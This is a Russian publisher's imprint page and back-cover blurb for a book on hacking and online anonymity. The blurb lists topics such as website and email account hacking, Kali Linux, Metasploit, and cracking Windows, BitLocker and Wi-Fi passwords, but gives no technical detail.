ООО "Издательство Наука и Техника" ОГРН 1217800116247, ИНН 7811763020, КПП 781101001 192029, г. Санкт-Петербург, пр. Обуховской обороны, д. 107, лит. Б, пом. 1-Н Подписано в печать 14.07.2023. Формат 70х100 1/16. Бумага газетная. Печать офсетная. Объем 22 п.л. Тираж 2000. Заказ 7312.

Отпечатано с готового оригинал-макета ООО «Принт-М», 142300; М.О., г.Чехов, ул. Полиграфистов, д.1



В книге вы узнаете: об основных принципах взлома сайтов (а чтобы теория не расходилась с практикой, будет рассмотрен реальный пример взлома); отдельная глава будет посвящена «угону» почтового ящика (будут рассмотрены различные способы взлома); как устроено анонимное общение в сети посредством электронной почты и всякого рода мессенджеров; как анонимно посещать сайты; как создать анонимный почтовый ящик и какой мессенджер позволяет зарегистрироваться без привязки к номеру телефона.

Также будут рассмотрены популярные инструменты хакеров - Kali Linux, которая содержит несколько сотен (более 600) инструментов, ориентированных на различные задачи информационной безопасности; и инструмент для поиска уязвимостей и взлома информационных систем – Metasploit. Отдельно поговорим о взломе паролей (на примере взлома учетной записи Windows); как можно взломать шифрование EFS, зашифрованный диск BitLocker и пароль Wi-Fi.





Издательство «Наука и Техника» Заказ книг: (812) 412-70-26 nitmail@nit.com.ru nit.com.ru

